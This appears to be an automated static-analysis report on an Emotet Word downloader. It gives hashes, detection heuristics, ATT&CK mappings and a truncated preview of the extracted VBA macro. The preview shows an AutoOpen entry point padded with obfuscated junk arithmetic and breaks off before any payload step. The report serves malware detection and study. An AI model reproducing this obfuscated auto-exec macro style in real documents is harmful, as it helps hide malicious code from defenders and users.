Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 29523b92e42dcb55…

MALICIOUS

Office (OLE)

Size: 184.0 KB
Created: 2019-03-27 08:49:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: 574171a94dce0308ebf86da8b94b7cf2
SHA-1: a291382350c16c59944225caecb102da0e49b4f5
SHA-256: 29523b92e42dcb55a4fb75221a797471a76f5ff547f86b4838bfc69f6c6dbd5f
Risk Score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6914192-0. Static analysis revealed the presence of a VBA macro with an AutoOpen function, which is a common characteristic of Emotet. The macro utilizes GetObject, indicating an attempt to execute code. The embedded URL, though benign, is noted as present in the document text.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6914192-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6914192-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 31859 bytes
SHA-256: 0ae21cf4488201fbccd6d930e16020ddfdc4558ca2b256749b29a91d9749b70c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "UC4ZxDD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Ck_DA4UA"
Attribute VB_Base = "0{486C1C95-0114-43F9-BD7C-0A6F50B65828}{535DEF30-7F36-4602-84F6-AB35C783844B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "cD1CQA"
Attribute VB_Base = "0{8B388202-1CBF-4E0E-AA5F-95EA4473B22A}{563E4B2C-A753-4250-B77E-DB3624B9FC62}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wxoAAwBA"
Function dA_ZwAA()
   If fADw4AQ_ = iXcADQ Then
      Gx1BAC = CGUAAQ _
- Int(852978923) / OADADkC - _
Fix(uXXQUAA + _
CBool(676839128) - W1UBDDo * Sin(801683744)) + (696524819 + _
CDate(26256593 / 712161871 + 490858321 * Rnd(778094165))) + IoZCQ1BZ / _
Sgn(B_X_1o + Log(959105222) / CDQXUQX_ * 274701611)
End If
   If MwAB1BC = jA1DA1X Then
      BQZBkD = EUBcUDD _
- CStr(897261986) / ZAADAkAD - _
CByte(cwAcXQxG + _
CByte(549917611) - nB14AAAU * Sqr(145948092)) + (260561931 + _
Hex(324551243 / 888550157 + 686435559 * CLng(441916773))) + rUDB4BUo / _
Round(CUADDQ + Tan(525451066) / HDAUcU * 646851334)
End If
   If bwkUA1 = DQABUA1 Then
      bDxAZoo = FQxDA4D _
- Atn(903257900) / OAZwkZCx - _
CDbl(q_oAB_A + _
CBool(331692801) - RXQ4UcX * Cos(18440044)) + (749279719 + _
Sqr(755450797 / 269047628 + 363032363 * Rnd(785793492))) + vooA_U / _
Oct(AAZoxAA + Rnd(319636971) / ocAAUAo * 723234855)
End If
   If vUcXxC = QkxXxAok Then
      tk1XGCoG = wUAAoAc _
- CBool(744026654) / KUADQ_Ax - _
Fix(nAAAcU + _
CByte(46840756) - qCxAU4 * CSng(291481056)) + (161365022 + _
Rnd(389649248 / 69415681 + 43991813 * Atn(746346236))) + G_BAUk / _
Atn(ZkA1cUk + Sgn(377489796) / IAoAAA * 656231566)
End If
   If VABUo4 = FAADB1C Then
      BcB4Zo = UAACUAA _
- Oct(278103709) / fUXwAQZ - _
Round(hZGkAQ + _
Oct(281597973) - JBD_oxAU * CSng(173964592)) + (545219200 + _
Oct(61743133 / 426133930 + 320640231 * Oct(846680798))) + qx1oAAw / _
Fix(NZAQAD + CByte(350652834) / PkD1AQD * 427483443)
End If
   If kQD4cco = DBZBUG Then
      kA4AAXAQ = lAQDkcAU _
- Oct(334075801) / YB1cAB - _
CDbl(i4U4AQ + _
Sgn(559199464) - CBAAx1U * Cos(508288067)) + (419044801 + _
CBool(132312033 / 636310124 + 882210694 * Round(793385188))) + H1oDcGA / _
Hex(iAQACUBQ + Hex(421360485) / JkAxA_cB * 981294150)
End If
   If jwUZAA = sDGDxDB Then
      uxcoBA = IQCQQDD _
- CStr(905177671) / QAUDAC - _
Sin(LABAAc + _
Fix(487728351) - rCDoAU * Sgn(967557542)) + (59331575 + _
Tan(301502246 / 735441792 + 109804044 * Tan(601666544))) + aCAAC_ / _
CDbl(jwXAUoBA + Oct(281045288) / FGAcAA * 891270297)
End If
   If m4CU4A = VAGDZA Then
      CBXABA_x = DBAZUAG _
- Sgn(206888878) / VUAAkw - _
CInt(MB_CQA + _
CDbl(9996470) - HAxABQX * Sqr(27965514)) + (591812421 + _
Atn(871907380 / 109742170 + 215169555 * Oct(628016639))) + S_kwAA / _
CInt(tCDoAxQ + Sgn(386114667) / aAA1Xx * 559535366)
End If
End Function
Sub autoopen()
On Error Resume Next
   If VUAAAQZA = lAABQUD Then
      ZZDAAD1A = PBADGAQA _
- Hex(206149849) / uoA44G4A - _
Rnd(PBAAoAU + _
Sin(95833808) - aAUUcAc * Sgn(881185195)) + (958884156 + _
CInt(749386780 / 622464135 + 485271367 * Sqr(457917020))) + qACAxAZ / _
CInt(zQAUwAD + CDate(225284472) / JAX44kDA * 568488764)
End If
   If t_AxDZA = nBABAAA Then
      aDBAAQ = qAoUBAA1 _
- Int(318435538) / s1DUAAC - _
Rnd(CoCAxUQ + _
Cos(740480803) - FGCQUX * Atn(128140215)) + (251078722 + _
Sgn(602757931 / 75540632 + 766342090 * Hex(221962883))) + MBBAUUA / _
CBool(HUQABc + CStr(756839905) / fXUAUx * 786446774)
End If
   If HAAAABA
... (truncated)